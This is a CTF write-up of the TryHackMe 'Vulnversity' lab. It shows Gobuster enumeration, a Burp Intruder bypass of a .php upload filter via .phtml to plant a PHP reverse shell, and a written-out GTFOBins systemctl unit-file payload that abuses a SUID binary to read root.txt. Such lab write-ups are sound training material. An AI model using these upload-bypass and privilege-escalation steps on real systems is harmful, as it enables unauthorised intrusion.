ctfwriteup.com
House of NotePwnie Island
Search…
whoarewe
Wargame
Jarvis OJ Pwn Xman Series
Jarvis OJ Crypto RSA Series
ROP Emporium
pwnable.kr Toddler's Bottle
picoCTF
picoMini 2020
picoCTF 2021
picoMini 2021
redpwnCTF
redpwnCTF 2021
Crypto CTF
Crypto CTF 2021
Hack The Box
Starting Point
Retired Machines
TCM Academy
TCM Linux Privilege Escalation Course
TryHackMe - Simple CTF (Easy)
TryHackMe - Vulnversity (Easy)
TryHackMe - CMesS (Medium)
TryHackMe - UltraTech (Medium)
TryHackMe - LazyAdmin (Easy)
TryHackMe - Anonymous (Medium)
TryHackMe - tomghost (Easy)
TryHackMe - ConvertMyVideo (Medium)
TryHackMe - Brainpan 1 (Hard)
TCM Windows Privilege Escalation Course
Powered By GitBook
TryHackMe - Vulnversity (Easy)
{"author" : ["ret2basic"]}

Summary

Gobuster finds a hidden directory /internal which has an upload form. The upload form filters .php extension, but Burp Intruder finds that phtml bypasses the filter. Here we rename php-reverse-shell.php to php-reverse-shell.phtml and get a www-data shell.
On the victim machine, /bin/systemctl is SUID. Using an arbitrary file read payload on GTFOBins, we are able to read root.txt without getting a root shell.

IP

  • RHOST: 10.10.64.243
  • LHOST: 10.13.12.2

Nmap

Nmap

Asset Discovery

Run Gobuster against port 3333:
1
gobuster dir -u http://10.10.64.243:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
Copied!
Gobuster finds /internal:
Gobuster

www-data shell: File Upload with PHP Extension Bypass

There is an upload form in /internal:
/internal
Try uploading php-reverse-shell.php here. However, this file is not present in the /internal/uploads directory:
Upload failed
Perhaps the .php file extension is blocked. Brute-force valid file extensions using Burpsuite Intruder. Remember turn off "URL-encode these characters":
Uncheck "URL-encode these characters"
Make a PHP extension wordlist:
1
.php
2
.php3
3
.php4
4
.php5
5
.phtml
Copied!
Intruder finds that the only valid extension is .phtml:
.phtml is a valid extension
Rename the PHP reverse shell payload to php-reverse-shell.phtml and upload again. This time the file is successfully uploaded:
Upload succeeds
Start a pwncat listener:
1
pwncat-cs :443
Copied!
Trigger the reverse shell payload and get a user shell as www-data:
www-data shell

Arbitrary File Read: SUID /bin/systemctl

Search for SUID file:
1
find / -perm -u=s -type f 2>/dev/null
Copied!
Note that /bin/systemctl is SUID:
/bin/systemctl
GTFOBins has a privesc payload for systemctl. Change the payload to cat /root/root.txt > /tmp/output:
1
$ TF=$(mktemp).service
2
$ echo '[Service]
3
Type=oneshot
4
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
5
[Install]
6
WantedBy=multi-user.target' > $TF
7
$ /bin/systemctl link $TF
8
$ /bin/systemctl enable --now $TF
Copied!
Execute these commands line by line on the victim machine and read the content of root.txt:
root.txt
Previous
TryHackMe - Simple CTF (Easy)
Next
TryHackMe - CMesS (Medium)
Last modified 11d ago
Copy link
Contents
Summary
IP
Nmap
Asset Discovery
www-data shell: File Upload with PHP Extension Bypass
Arbitrary File Read: SUID /bin/systemctl